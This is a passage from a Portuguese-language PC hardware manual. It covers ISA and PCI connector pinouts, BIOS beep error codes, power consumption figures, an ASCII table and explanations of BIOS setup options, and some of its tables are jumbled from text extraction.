2 (B_X) 12 GND 13 POSIÇÃO
DB15 FÊMEA
Terrorismo Tecnológico Aprenda Para Sobreviver
423
3 (B_Y) 14 BOTÃO 7
(B_PB2) 15 +5 VDC
CONECTOR DO BARRAMENTO ISA
sinal pinos sinal GND B1 A1 IOCHCk RESET B2 A2 D7 +5v B3 A3 D6 IRQ9 B4 A4 D5 -5v B5 A5 D4 DRQ2 B6 A6 D3 -12v B7 A7 D2 WS B8 A8 D1 +12v B9 A9 D0 GND B10 A10 IOCHRDY Mem W B11 A11 AEN Mem R B12 A12 A19 IO W B13 A13 A18 IO R B14 A14 A17 DACK3 B15 A15 A16 DRQ3 B16 A16 A15 DACK1 B17 A17 A14 DRQ1 B18 A18 A13 Ref B19 A19 A12 CLK B20 A20 A11
Terrorismo Tecnológico Aprenda Para Sobreviver
424
IRQ7 B21 A21 A10 IRQ6 B22 A22 A9 IRQ5 B23 A23 A8 IRQ4 B24 A24 A7 IRQ3 B25 A25 A6 DRQ2 B26 A26 A5 TC B27 A27 A4 ALE B28 A28 A3 +5v B29 A29 A2 OSC B30 A30 A1 GND B31 A31 A0
M16CS D1 C1 SBHE
IO16CS D2 C2 A23
IRQ10 D3 C3 A22
IRQ11 D4 C4 A21
IRQ12 D5 C5 A20
IRQ15 D6 C6 A19
IRQ14 D7 C7 A18
DACK0 D8 C8 A17
DRQ0 D9 C9 MR
DACK5 D10 C10 MW
DRQ5 D11 C11 D8
DACK6 D12 C12 D9
DRQ6 D13 C13 D10
DACK7 D14 C14 D11
Terrorismo Tecnológico Aprenda Para Sobreviver
425
DRQ7 D15 C15 D12
+5v D16 C16 D13
Master D17 C17 D14
GND D18 C18 D15
CONECTOR DO BARRAMENTO PCI
SINAL PINO SINAL -12v A1 B1 TRS# Test Reset
TCK Test clok A2 B2 +12 v GND A3 B3 TMS (Test Mode Select) TDO Test data output
A4 B4 TDI (Test Data Imput)
+5v A5 B5 +5v +5v A6 B6 INTA (interrupt A) INTB (interrupt B) A7 B7 INTC (interrupt C) INTD (interrupt D) A8 B8 Reserved PRSNT 1 Exp.Card Present 1
A9 B9 +5v
Reserved A10 B10 Reserved PRSNT 2 Exp.Card Present 2
A11 B11 GND
GND A12 B12 GND GND A13 B13 Reserved Reserved A14 B14 RST (Reset) GND A15 B15 +5v
Terrorismo Tecnológico Aprenda Para Sobreviver
426
CLK Clock A16 B16 GNT (Grant (Bus Memory Only)
GND A17 B17 GND REQ (Bus Master Only)
A18 B18 AD30(Address-Data 30)
+5v A19 B19 +3.3v AD31(Address-Data 31)
A20 B20 AD28(Address-Data 28)
AD29(Address-Data 29)
A21 B21 AD26(Address-Data 26)
GND A22 B22 GND AD27(Address-Data 27)
A23 B23 AD24(Address-Data 24)
AD25(Address-Data 25)
A24 B24 IDSEL Iniciliazation;Device Select
+3.3v A25 B25 +3.3v CBE3 Bus Command Byte EN 3
A26 B26 AD22(Address-Data 22)
AD23(Address-Data 23)
A27 B27 AD20(Address-Data 20)
GND A28 B28 GND AD21(Address-Data 21)
A29 B29 AD18(Address-Data 18)
AD19(Address-Data 19)
A30 B30 AD16(Address-Data 16)
+3.3v A31 B31 +3.3v AD17(Address-Data 17)
A32 B32 FRME# Cycle Flame
CBE2 Bus Command Byte EN 2
A33 B33 GND
GND A34 B34 TRDY (Target Ready)
Terrorismo Tecnológico Aprenda Para Sobreviver
427
IRDY Initiador Ready
A35 B35 GND
+3.3v A36 B36 Stop DEVSEL Device Select
A37 B37 +3.3v
GND A38 B38 SDONE Snoop Done Lock A39 B39 SBO Snoop Backoff PERR Parity Error A40 B40 GND +3.3v A41 B41 PAR Parity SERR System Error
A42 B42 AD15(Address-Data 15)
+3.3v A43 B43 +3.3v CBE1 Bus Command Byte EN 1
A44 B44 AD13(Address-Data 13)
AD14(Address-Data 14)
A45 B45 AD11(Address-Data 11)
GND A46 B46 GND AD12(Address-Data 12)
A47 B47 AD9(Address-Data 9)
AD10(Address-Data 10)
A48 B48 Key
GND A49 B49 Key Key A52 B52 CBE0# Bus Command
Byte EN 0 Key A53 B53 +3.3v AD8(Address-Data 8)
A54 B54 AD6(Address-Data 6)
AD7(Address-Data 7)
A55 B55 AD4(Address-Data 4)
+3.3v A56 B56 GND
Terrorismo Tecnológico Aprenda Para Sobreviver
428
AD5(Address-Data 5)
A57 B57 AD2(Address-Data 2)
AD3(Address-Data 3)
A58 B58 AD0(Address-Data 0)
GND A59 B59 +5v AD1(Address-Data 1)
A60 B60 REQ64 Request 64 bit Transfer
+5v A61 B61 +5v ACK 64 bit Transfer
A62 B62 +5v
Terrorismo Tecnológico Aprenda Para Sobreviver
430
CÓDIGOS DE ERRO GERADOS POR BEEPS DE BIOS
BIOS AMI
FHOENIX 4.0
1 Refresh dos módulos de memória com defeito ( pode ser causado pela placa mãe )
1 1 1 31 1 1 4
Processador ou placa mãe
2 Paridade de memória ( sistema que checa paridade ou pente de memória com defeito)
1 1 2 31 1 1 4
Placa mãe
3 Primeiros 64 Kb de memória com problema
1 1 3 4 Cachê do processador
4 Clock com defeito ( placa mãe )
1 1 4 4 Inicialização da controladora IDE
5 Placa mãe ou processador com defeito ( geralmente o defeito é na placa pois o processador achou o problema )
1 2 1 4 Bus Mastering
1 2 2 1 3 1 3 1
controladora do teclado com problema ( pode ser placa mãe )
6 Teclado ou acesso a memória alta com defeito
1 2 2 3 Bios ou placa mãe com defeito
7 Novamente placa mãe ou processador com defeito ( geralmente o defeito é na placa pois o
1 3 1 1 Memória ou placa mãe
Terrorismo Tecnológico Aprenda Para Sobreviver
431
processador achou o problema )
8 Falha no teste da memória de vídeo ( placa de vídeo ou placa mãe )
1 3 4 11 3 4 31 4 1 1
Memória ou placa mãe ( verifique a memória primeiro )
9 Programa da bios com problema ( pode ser causado também pela placa mãe )
2 1 3 2 Alguma placa PCI com problema
10 Problema com leitura de dados CMOS da Bios deve-se resetar a CMOS se persiste o erro deve-se substituir a placa mãe.
2 1 3 3 Placa de vídeo ( ou placa mãe )
11 Memória cachê da placa mãe ( se houver ) esta com defeito
2 2 4 1 Memória da placa mãe ( cachê )
BIOS AWARD
1 longo1 curto
Bios de terceiros ( placas extras como controladoras SCSI por exemplo )
1 longo Um dos primeiros módulos de memória com defeito
1 longo2 curtos
Controladora de vídeo com defeito ( pode ser causado pela placa mãe )
os demais Memória RAM
Observação: Quando não houver som deve-se verificar primeiramente os pentes de memória se estão bem encaixados, se não resolver reset a CMOS, verifique o encaixe do processador ( se a bateria que alimenta a CMOS estiver com carga muito baixa também pode impedir a inicialização do sistema. Se após tudo isto continuar sem
Terrorismo Tecnológico Aprenda Para Sobreviver
432
ou placa mãe sinal, há maior chance de haver um problema grave com a placa mãe e em segundo caso o processador
mais...beeps
AMI BIOS Tone POST Codes -
AMI BIOS Tone POST Codes - Fatal Errors
TONE CONDITION 1 short DRAM refresh 2 short Parity circuit 3 short Base 64K RAM 4 short System timer 5 short Processor 6 short Keyboard
controller gate A20
7 short Virtual mode exception
8 short Display memory read/write test
9 short ROM BIOS checksum
10 short CMOS shutdown read/write
11 short Cache memory
Terrorismo Tecnológico Aprenda Para Sobreviver
433
Non-Fatal Errors TONE CONDITION 1 long, 3 short
Conventional/extended memory
1 long, 8 short
Display/retrace test
Phoenix BIOS Tone POST Codes - Fatal Errors
TONE CONDITION None CPU register test None First 64K RAM test None Interrupt vector
loading proceeding None CMOS power
failure/checksum calculation
None Display configuration validation proceeding
None Display running with video ROM
None Display functional None Mononchrome
display functional None CGA display
functional 1-1-3 CMOS write/read 1-1-4 ROM BIOS
checksum
Terrorismo Tecnológico Aprenda Para Sobreviver
434
1-2-1 Programmable interval timer
1-2-2 DMA Initialization 1-2-3 DMA page register
write/read 1-3-1 RAM refresh
verification 1-3-3 First 64K RAM chip
or data line 1-3-4 First 64K RAM
odd/even logic 1-4-1 Address line first
64K RAM 1-4-2 Parity failure first
64K RAM 2-1-1 Bit 0, first 64K RAM 2-1-2 Bit 1, first 64K RAM 2-1-3 Bit 2, first 64K RAM 2-1-4 Bit 3, first 64K RAM 2-2-1 Bit 4, first 64K RAM 2-2-2 Bit 5, first 64K RAM 2-2-3 Bit 6, first 64K RAM 2-2-4 Bit 7, first 64K RAM 2-3-1 Bit 8, first 64K RAM 2-3-2 Bit 9, first 64K RAM 2-3-3 Bit 10, first 64K RAM 2-3-4 Bit 11, first 64K RAM 2-4-1 Bit 12, first 64K RAM 2-4-2 Bit 13, first 64K RAM 2-4-3 Bit 14, first 64K RAM 2-4-4 Bit 15, first 64K RAM 3-1-1 Slave DMA register 3-1-2 Master DMA register 3-1-3 Master interrupt
mask register
Terrorismo Tecnológico Aprenda Para Sobreviver
435
3-1-4 Slave interrupt mask register
3-2-4 Keyboard controller 3-3-4 Display initialization 3-4-1 Display retrace 3-4-2 Search for video
ROM proceeding
Phoenix BIOS POST Tone Codes - Non-Fatal Errors
TONE CONDITION 4-2-1 Timer tick
interrupt test 4-2-2 Shutdown test 4-2-3 Gate A20 Failure 4-2-4 Unexpected
interrupt in protected moe
4-3-1 RAM test (address failure >FFFFh)
4-3-3 Interval timer channel 2
4-3-4 Real time clock 4-4-1 Serial Port 4-4-2 Parallel Port 4-4-3 Math Co-
processor test 1-1-2* System board
select 1-1-3* Extender CMOS
RAM
IBM POST Tone Codes
TONE CONDITION
Terrorismo Tecnológico Aprenda Para Sobreviver
436
NONE System board, power supply
1 short System passed all tests
2 short Display error continuous System board,
power supply 1 long,1short
System board
1 long, 2 short
Video adapter
1 long, 3 short
EGA
3 long 3270 keyboard card
Terrorismo Tecnológico Aprenda Para Sobreviver
438
GERENCIAMENTO DE CONSUMO DE ENERGIA NOS PCs O consumo de energia de um PC depende de vários fatores como tipo de processador, quantidades de componentes instalados, monitor, periféricos ...etc..., e depende também do gerenciamento de energia do sistema. Temos abaixo algumas tabelas que pode ajudar a configuração do gerenciamento de energia nos PCs.
CONSUMO DE ALGUNS TIPOS DE PCs
Computador ou monitor (com
recursos médios)
Potência sem gerenciamento de
consumo
Potência com gerenciamento de
consumo 386 65 Watts 25 Watts 486 55 Watts 25 Watts Pentium 45 Watts 15 Watts Monitor de 14" 45 Watts 5 Watts Monitor de 15" 70 Watts 5 Watts Monitor de 20" 120 Watts 5 Watts
CONSUMO DE ALGUNS PERIFÉRICOS E DISPOSITIVOS
Cooler 1,44 Watts Drive de Disquetes 5 Watts Drive de CD ou DVD 20 Watts Gravador de CD 25 Watts HD 10 Watts Impressora matricial 30 a 50 Watts Impressora Jato de Tinta 30 a 50 Watts Impressora a Laser 500 a 800 Watts Mouse PS2 0,44 Watts Mouse serial 0,12 Watts Scanner de mesa 40 a 50 Watts Scanner manual 4 a 8 Watts Som 4 a 5 Watts ( depende da
potência de áudio e volume
Terrorismo Tecnológico Aprenda Para Sobreviver
439
usado) Teclado 1,25 Watts Zip IDE interno Maximo 8,5 Watts
HABILITANDO O GERENCIAMENTO DE CONSUMO
O gerenciamento de consumo está disponível em todos os computadores e podem ser habilitados, nos mais antigos pode-se apenas reduzir o consumo do monitor, mas nos mais modernos pode-se gerenciar o consumo de quase todos os dispositivos.
SISTEMA OPERACIONAL
No sistema operacional Windows pode-se reduzir o consumo
ativando-se o protetor de tela ( screensaver ) do monitor e ajustando as opções para outros dispositivos ( HD ) através do programa de
Gerenciamento de energia ( Painel de controle ).
BIOS:
Também se pode usar para a finalidade de economia de energia através das opções Standby ( sleep ), doze e suspend.
Doze - Reduz o consumo durante a inatividade do sistema, com a redução da velocidade do processador.
Standby - Envia o sinal de Power down para o monitor. Suspend - Envia um comando para a CPU e para o monitor para
entrar em estado de baixo consumo.
Exemplo de configuração de consumo pela BIOS. Power management User Define IRQ1- Keyboard On PM Control by APM Yes
Terrorismo Tecnológico Aprenda Para Sobreviver
440
IRQ3-COM2 ( Com PORT ) Off VGA Adapter Type Green IRQ4-COM1 ON Doze Mode 20 Sec IRQ5-LPT2 Off Standby Mode 5 Min IRQ6-FDD Controller On Suspend Mode 10 Min IRQ7-LPT1 Off HDD Power Down 15 Min IRQ8-RTC Real time Clock Alarm
Off
IRQ3 ( wake up event ) Off IRQ9-IRQ2 Redir Off IRQ4 ( wake up event ) On IRQ10-( Reserved ) Off IRQ8 ( wake up event ) Off IRQ11-( Reserved ) On IRQ12 ( wake up event ) Off IRQ12-ps 2 Mouse On
POWER DOWN ACTIVITIES
IRQ13-Numeric Data Processor
Off
COM Ports Accessed Off IRQ14-HDD, IDE / ESDI Controller
On
LPT Ports Accessed Off IRQ15-Reserved Off DMA Active ( DMA ) Off
Terrorismo Tecnológico Aprenda Para Sobreviver
442
TABELA ASCII
Tabela ASCII gerada em PC teclado ABNT2
DEC HEX ASC DEC HEX ASC DEC HEX ASC DEC HEX ASC 0 0 NUL 64 40 @ 128 80 Ç 192 C0 + 1 1 SOH 65 41 A 129 81 ü 193 C1 - 2 2 STX 66 42 B 130 82 é 194 C2 - 3 3 ETX 67 43 C 131 83 â 195 C3 + 4 4 EOT 68 44 D 132 84 ä 196 C4 - 5 5 ENQ 69 45 E 133 85 à 197 C5 + 6 6 ACK 70 46 F 134 86 å 198 C6 ã 7 7 BEL 71 47 G 135 87 ç 199 C7 Ã 8 8 BS 72 48 H 136 88 ê 200 C8 + 9 9 HT 73 49 I 137 89 ë 201 C9 + 10 A LF 74 4A J 138 8A è 202 CA - 11 B VT 75 4B K 139 8B ï 203 CB - 12 C FF 76 4C L 140 8C î 204 CC ¦ 13 D CR 77 4D M 141 8D ì 205 CD - 14 E SO 78 4E N 142 8E Ä 206 CE + 15 F SI 79 4F O 143 8F Å 207 CF ¤ 16 10 DLE 80 50 P 144 90 É 208 D0 ð 17 11 DC1 81 51 Q 145 91 æ 209 D1 Ð 18 12 DC2 82 52 R 146 92 Æ 210 D2 Ê 19 13 DC3 83 53 S 147 93 ô 211 D3 Ë 20 14 DC4 84 54 T 148 94 ö 212 D4 È 21 15 NAK 85 65 U 149 95 ò 213 D5 i 22 16 SYN 86 56 V 150 96 û 214 D6 Í 23 17 ETB 87 57 W 151 97 ù 215 D7 Î
Terrorismo Tecnológico Aprenda Para Sobreviver
443
24 18 CAN 88 58 X 152 98 ÿ 216 D8 Ï 25 19 EM 89 59 Y 153 99 Ö 217 D9 + 26 1A SUB 90 5A Z 154 9A Ü 218 DA + 27 1B ESC 91 5B [ 155 9B ø 219 DB _ 28 1C FS 92 5C \ 156 9C £ 220 DC _ 29 1D GS 93 5D ] 157 9D Ø 221 DD ¦ 30 1E RS 94 5E ^ 158 9E × 222 DE Ì 31 1F US 95 5F _ 159 9F ƒ 223 DF _ 32 20 SP 96 60 ` 160 A0 á 224 E0 Ó 33 21 ! 97 61 a 161 A1 í 225 E1 ß 34 22 " 98 62 b 162 A2 ó 226 E2 Ô 35 23 # 99 63 c 163 A3 ú 227 E3 Ò 36 24 $ 100 64 d 164 A4 ñ 228 E4 õ 37 25 % 101 65 e 165 A5 Ñ 229 E5 Õ 38 26 & 102 66 f 166 A6 ª 230 E6 µ 39 27 ' 103 67 g 167 A7 º 231 E7 þ 40 28 ( 104 68 h 168 A8 ¿ 232 E8 Þ 41 28 ) 105 69 i 169 A9 ® 233 E9 Ú 42 2A * 106 6A j 170 AA ¬ 234 EA Û 43 2B + 107 6B k 171 AB ½ 235 EB Ù 44 2C , 108 6C l 172 AC ¼ 236 EC ý 45 2D - 109 6D m 173 AD ¡ 237 ED Ý 46 2E . 110 6E n 174 AE « 238 EE ¯ 47 2F / 111 6F o 175 AF » 239 EF ´ 48 30 0 112 70 p 176 B0 _ 240 F0 48 31 1 113 71 q 177 B1 _ 241 F1 ± 50 32 2 114 72 r 178 B2 _ 242 F2 _ 51 33 3 115 73 s 179 B3 ¦ 243 F3 ¾
Terrorismo Tecnológico Aprenda Para Sobreviver
444
52 34 4 116 74 t 180 B4 ¦ 244 F4 ¶ 53 35 5 117 75 u 181 B5 Á 245 F5 § 54 36 6 118 76 v 182 B6 Â 246 F6 ÷ 55 37 7 119 77 w 183 B7 À 247 F7 ¸ 56 38 8 120 78 x 184 B8 © 248 F8 ° 57 39 9 121 79 y 185 B9 ¦ 249 F9 ¨ 58 3A : 122 7A z 186 BA ¦ 250 FA · 59 3B ; 123 7B { 187 BB + 251 FB ¹ 60 3C < 124 7C | 188 BC + 252 FC ³ 61 3D = 125 7D } 189 BD ¢ 253 FD ² 62 3E > 126 7E ~ 190 BE ¥ 254 FE _ 63 3F ? 127 7F DEL 191 BF + 255 FF DEL
Terrorismo Tecnológico Aprenda Para Sobreviver
446
Setup
Para entrar no setup você deve pressionar a tecla Del durante a contagem de memória. Em alguns micros "de marca" (como os da IBM), a tecla é outra e você deve prestar atenção às instruções que aparecem na tela do micro durante a contagem de memória para poder ter acesso ao setup.
Dentro do setup, a navegação é normalmente feita utilizando-se as setas de movimentação do teclado, a tecla Enter para selecionar um menu, Esc para retornar ao menu anterior e as teclas Page Up e Page Down para modificar uma opção existente.
É muito importante notar que as alterações feitas enquanto você está dentro do setup não são gravadas automaticamente dentro da memória de configuração (CMOS). Por isso há a necessidade de se gravar as alterações antes de sair do setup, através da opção Save and Exit.
Ao entrar no setup você verá um menu principal com opções para a entrada em outros menus de configuração. Essas opções são basicamente as seguintes:
• CPU Setup: Em micros onde a placa-mãe não tem jumpers de configuração você encontrará esse menu, que serve para você configurar o processador: multiplicação de clock, clock externo, etc
• Standard CMOS Setup: Setup básico. Nesse menu configuramos opções básicas do micro, como o tipo de unidade de disquete, a data e hora e os parâmetros do disco rígido (os parâmetros do disco rígido podem ser configurados automaticamente através de uma opção chamada Hdd Auto Detection).
Terrorismo Tecnológico Aprenda Para Sobreviver
447
• Advanced CMOS Setup (ou BIOS Features Setup): Setup avançado. Aqui você encontrará algumas opções de configuração avançada, que em sua maioria inclui opções de customização do seu micro e que podem ser alteradas de acordo com o seu gosto pessoal. Também há aqui algumas opções que podem aumentar o desempenho do micro.
• Advanced Chipset Setup: Setup avançado do chipset. São opções para a configuração do chipset da placa-mãe. Essas opções incluem configurações que normalmente envolvem o acesso à memória RAM do micro, como wait states. Se você fizer alguma configuração errada nesse menu o micro pode travar. Por isso, não mexa nas opções desse menu a não ser que você tenha certeza do que está fazendo.
• PCI/Plug and Play Setup: Configura os recursos alocados por dispositivos instalados no micro, tais como placas de som e fax/modems.
• Power Management Setup: Neste menu você faz toda a configuração do gerenciamento de consumo elétrico, a fim de que o micro economize energia.
• Peripheral Setup (ou Integrated Peripherals): Configura os dispositivos integrados à placa-mãe (on-board).
• Auto Configuration With BIOS Defaults: Coloca os valores de fábrica em todas as opções do setup.
Terrorismo Tecnológico Aprenda Para Sobreviver
448
• Auto Configuration With Power-on Defaults: Coloca os valores contidos na memória CMOS nas opções do setup. Em outras palavras, configura o setup da mesma maneira que estava antes de você entrar nele.
• Change Password: Configura uma senha que será pedida quando você ligar o micro (ou tentar entrar no setup, dependendo da configuração efetuada no setup avançado).
• Auto Detect Hard Disk (ou HDD Auto Detect ou IDE Setup): Lê os parâmetros dos discos rígidos IDE do micro e configura automaticamente o setup avançado com os valores lidos.
• Hard Disk Utility (ou HDD Low Level Format): Formata o disco rígido em baixo nível (formatação física). Essa opção não deve nunca ser usada, sob a pena de você danificar permanentemente o seu disco rígido.
• Write to CMOS and Exit: Salva as alterações efetuadas na memória de configuração (CMOS) e sai do setup.
• Do Not Write to CMOS and Exit: Sai do setup sem gravar as alterações.
Terrorismo Tecnológico Aprenda Para Sobreviver
449
O setup básico não apresenta dificuldades em sua configuração. Nele você deve configurar:
Data e hora do sistema, através das opções date e time, respectivamente. Tipos de unidades de disquete instaladas no micro. Você deve configurar que tipo (2.88 MB, 1.44 MB, 1.2 MB, 720 KB ou 360 KB) são as unidades de disquete A e B de seu micro. Um erro muito comum cometido por iniciantes é achar que para trocar a unidade A com a B (isto é, a atual unidade A passar a se chamar B e vice-versa) basta mudar aqui a configuração. Isso não é verdade. Para trocar a unidade A com a B é necessário abrir o micro e trocar a posição das unidades no flat-cable que liga as unidades à controladora (normalmente na placa-mãe). A unidade instalada na ponta do cabo sempre será a A e a unidade instalada no meio, sempre será a unidade B. Como atualmente a maioria dos micros só tem uma unidade (A, de 1.44 MB), na maioria das vezes você deve configurar a unidade A como sendo de 1.44 MB e a unidade B como "não instalada" (Not Installed). Geometria do disco rígido. Essa é a configuração mais difícil do setup básico mas, para a nossa sorte, há uma opção no menu principal do setup – chamada Hdd Auto Detection, IDE Setup ou similar, como vimos na semana passada – que lê os dados do disco rígido e configura automaticamente a geometria do disco rígido. Portanto, não há com o que se preocupar. Tipo de placa de vídeo. Configure como EGA/VGA. Algumas pessoas se confundem aqui. Essa opção configura o tipo de placa de vídeo instalada dentro do micro e não o tipo de monitor de vídeo. Existe uma opção chamada "Monochrome", que é para micros que tenham uma placa de vídeo MDA instalada. Se você tem um micro com placa de vídeo VGA ou Super VGA com um monitor monocromático instalado, a opção correta é EGA/VGA (que configura a placa de vídeo que está instalada no micro) e não Monochrome (já que a sua placa de vídeo não é MDA).
Terrorismo Tecnológico Aprenda Para Sobreviver
450
E só. Em alguns setups podem aparecer algumas opções a mais:
• Floppy Mode 3 Support: Existe uma unidade de disquete japonesa que é de 3 1/2" e 1.2 MB (em vez de 1.44 MB) e, para que o micro a reconheça, é necessário habilitar esta opção. Como você provavelmente não tem esse tipo de unidade em seu micro, deixe essa opção desabilitada (Disabled).
• Halt On: Essa opção informa ao micro em que situação de erro ele deverá parar durante o auto teste inicial da máquina (POST). A opção default é "All Errors", ou seja, em qualquer situação de erro detectada durante o autoteste o micro irá parar e uma mensagem de erro será apresentada. Já a opção "All but keyboard" fará o micro parar em todos os tipos de erro, menos em erros de teclado. E assim por diante de acordo com as demais opções disponíveis. Nossa recomendação é que você configure essa opção em "All Errors".
• Daylight Saving: Essa opção não é muito comum e provavelmente você só encontrará em micros muito antigos. Essa opção habilita o ajuste automático do horário de verão (que em inglês chama-se daylight saving). Acontece que esse ajuste baseia-se nos EUA, onde o verão ocorre durante o nosso inverno e, portanto, essa opção deve permanecer desabilitada (Disabled).
É claro que em alguns micros você poderá encontrar outras informações no setup básico, como a quantidade de memória RAM instalada no micro. Mas as opções que você encontrará em todos os setups são essas que apresentamos.
Terrorismo Tecnológico Aprenda Para Sobreviver
451
Como o próprio nome indica, no setup avançado (Advanced CMOS Setup) existem opções avançadas de configuração do micro. Entretanto, a maioria das opções do setup avançado são ajustadas de acordo com o gosto do usuário, como você perceberá. A seguir iremos apresentar as opções mais comuns do setup avançado, indicando a nossa recomendação de configuração, muito embora você não precise seguir à risca nossas recomendações já que, como dissemos, diversas opções são configuradas de acordo com o gosto do usuário.
É importante notar que o setup do seu micro pode não ter todas as opções aqui descritas, da mesma forma que podem existir opções que não apresentamos aqui. Lembre-se que para habilitar uma opção, você deverá configurá-la como "enabled" e, para desabilitar, como "disabled".
• Typematic Rate Programming: Você pode configurar a taxa de repetição de teclas do teclado habilitando essa opção, isto é, ao manter uma tecla pressionada, ela começará a ser repetida automaticamente. A configuração dessa taxa é feita através das duas opções a seguir.
• Typematic Rate Delay: Configura o tempo que o micro demorará para começar a repetir uma tecla caso você mantenha ela pressionada. O valor configurado nessa opção é dado em milissegundos.
• Typematic Rate: Configura a quantidade de caracteres por segundo que a repetição automática irá gerar.
Terrorismo Tecnológico Aprenda Para Sobreviver
452
• Quick Power On Self Test: Em BIOS Award, o teste de memória é executado três vezes. Com essa opção habilitada, o teste é feito somente uma vez, tornando o processo de boot mais rápido.
• Above 1 MB Memory Test: Habilite essa opção para que o micro teste toda a memória RAM durante a contagem de memória. Caso essa opção não seja habilitada, o micro só irá testar o primeiro 1 MB de memória, o que não é bom.
• Memory Test Tick Sound: Habilita o barulho ("tick") feito durante a contagem de memória. O ajuste fica a gosto pessoal.
• Hit <del> Message Display: Com essa opção habilitada, a mensagem "Hit <del> To Run Setup" é mostrada durante a contagem de memória. Nossa recomendação é que essa opção permaneça habilitada, muito embora você continue podendo entrar no setup normalmente mesmo que essa mensagem não seja apresentada durante a contagem de memória.
• Wait For <F1> If Any Error: Similarmente à opção anterior, habilita a mensagem "Press <F1> To Resume" caso ocorra algum erro durante o autoteste (POST). Recomendamos habilitar essa opção.
Terrorismo Tecnológico Aprenda Para Sobreviver
453
• System Boot Up Num Lock: Configura o estado da tecla Num Lock ao ligar o micro. Nossa sugestão é habilitar essa opção.
• Floppy Drive Seek at Boot: Faz um teste, após a contagem de memória, para ver se as unidades de disquete configuradas no setup básico realmente estão instaladas. Nossa recomendação é que você desabilite essa opção para que o processo de boot torne-se mais rápido.
• System Boot Up Sequence: Configura a seqüência de boot, isto é, de qual unidade o boot será dado. Nossa recomendação é que você configure essa opção como "C Only" (ou "C, A" caso essa opção não exista). Isso fará com que o boot seja mais rápido (já que o micro irá ler diretamente o sistema operacional do disco rígido) e evitará que o seu micro seja contaminado por vírus de boot (já que o boot através de disquete ficará desabilitado).
• Bootsector Virus Protection (ou Anti-virus ou Virus Warning): Tome cuidado, pois o nome dessa opção induz a um erro. Com essa opção habilitada, o micro não irá permitir que nenhum programa atualize o setor de boot do disco rígido, tarefa que algum vírus pode tentar efetuar. O grande problema é que alguns utilitários de disco (como o Norton Utilities) e o próprio programa de instalação do sistema operacional alteram dados do setor de boot, fazendo com que o micro acuse falsamente um erro quando essa opção está habilitada. Aliás, é por isso que muitos técnicos não conseguem instalar o sistema operacional quando essa opção está habilitada. Por isso, nossa recomendação é que você mantenha essa opção desabilitada. Se você quer se proteger contra vírus, use um bom programa anti-vírus.
Terrorismo Tecnológico Aprenda Para Sobreviver
454
• Password Checking Option (ou Security Option): No menu principal do setup podemos definir, através da opção Change Password, uma senha que será pedida quando o micro é ligado. Através dessa opção configuramos quando essa senha será solicitada: sempre em que ligamos o micro (opção Always ou System) ou então só quando tentamos entrar no setup (opção Setup). A configuração fica a seu critério, de acordo com a sua política de segurança.
• Swap Floppy Drive ou Floppy Drive Swapping: Essa opção troca a unidade A com a B. Isto é, se a sua unidade A for de 5 1/4" e a B, de 3 1/2", habilitando essa opção a unidade A passará a ser a de 3 1/2" e a B, a de 5 1/4". Como hoje em dia a maioria dos micros só possui uma única unidade de disquetes (de 3 1/2"), essa opção deve permanecer desabilitada.
• PCI VGA Palette Snooping ou VGA Palette Snoop: Essa opção compatibiliza algumas placas de vídeo antigas de alta resolução com o padrão VGA. Como atualmente todas as placas de vídeo são compatíveis com esse padrão, essa opção deve ficar desabilitada.
• Hard Disk Type 47 RAM Area ou Extended ROM RAM Area ou Extended BIOS RAM Area ou Scratch RAM Option: Essa opção configura como será acessada a área de memória RAM que o BIOS usa como rascunho. Existem duas opções: "DOS 1KB", que diminui a memória convencional de 640 KB para 639 KB e usa essa área de 1 KB para acessar a área de rascunho; ou "0:300", que usa o endereço 300h para acessar
Terrorismo Tecnológico Aprenda Para Sobreviver
455
essa área de rascunho. A primeira opção é melhor, já que a segunda opção normalmente fará com que o seu micro apresente conflito com uma placa de rede, que placas de rede normalmente utilizam o endereço 300h para se comunicarem com o micro. Essa perda de 1 KB de memória atualmente é desprezível.
• External Cache Memory ou L2 Cache Memory: Habilita o cache de memória L2. Habilite, ou o seu micro ficará muito lento.
• Internal Cache Memory ou L1 Cache Memory: Habilita o cache de memória L1. Habilite, ou o seu micro ficará muito lento.
• System BIOS Cacheable ou System ROM Cacheable ou System BIOS Cacheable: Essa opção faz com que o BIOS do micro seja acessado usando o cache de memória, o que aumenta o desempenho do micro consideravelmente. Portanto, habilite essa opção.
• Video BIOS Cacheable ou Video Cacheable Option ou Video ROM Cache: Idem para a memória ROM da placa de vídeo. Habilite essa opção.
• System ROM Shadow ou Main BIOS Shadow ou Adaptor ROM Shadow F000, 64K ou F Segment Shadow: O shadow é uma técnica onde o conteúdo da memória ROM é copiado
Terrorismo Tecnológico Aprenda Para Sobreviver
456
para a memória RAM e a memória RAM passa a ser acessada em vez da ROM. Isso é feito de forma a aumentar o desempenho do micro, já que o tempo de acesso da memória ROM é maior do que o tempo de acesso da memória RAM (ou seja, a memória ROM é mais lenta do que a RAM). Essa opção habilita o shadow do BIOS do micro, fazendo com que o conteúdo do BIOS seja copiado para a RAM e, a partir de então, o processador passa a acessar a cópia do BIOS que está na memória RAM e não mais diretamente a memória ROM do micro. Obviamente recomendamos que essa opção seja habilitada.
• Video ROM Shadow ou Adaptor ROM Shadow C000, 32K ou Adaptor ROM Shadow C400, 16K: Idem para a ROM da placa de vídeo. Recomendamos que essa opção seja habilitada.
• Outras opções de Shadow: Outras opções de shadow deverão permanecer desabilitadas, já que normalmente não há outras memórias ROM no micro e, portanto, não há a necessidade de se habilitar shadow de outras áreas de memória.
• Floppy Disk Acess Control: Essa opção configura se o usuário terá acesso total à unidade de disquete (opção R/W, Read/Write) ou se ele poderá apenas ler disquetes (opção Read Only). Configure em "R/W", a não ser em algum caso particular que você não queira permitir gravação em disquetes.
Terrorismo Tecnológico Aprenda Para Sobreviver
457
• HDD Sequence SCSI/IDE First: Se você tiver um disco rígido IDE e um SCSI instalados ao mesmo tempo no micro, você poderá configurar, através desta opção, qual deles que dará boot. Se você não tiver um disco SCSI, deixe essa opção em "IDE". Caso contrário, ajuste conforme a sua necessidade.
• Assign IRQ for VGA: Essa opção força a placa de vídeo a usar uma linha de interrupção. Se desabilitarmos essa opção, a placa de vídeo não usará uma IRQ, liberando uma interrupção para ser usada para algum outro periférico, o que pode ser conveniente em alguns casos (micros lotados de periféricos gerando conflitos de interrupção com a placa de vídeo). Embora isso possa parecer interessante, os programas DOS (sobretudo jogos) não conseguirão acessar o vídeo com mais de 256 cores se essa opção estiver desabilitada. Por isso, recomendamos que você deixe essa opção habilitada. Inclusive essa é a solução do caso clássico de você não estar conseguindo configurar mais de 256 cores em seu jogos predileto.
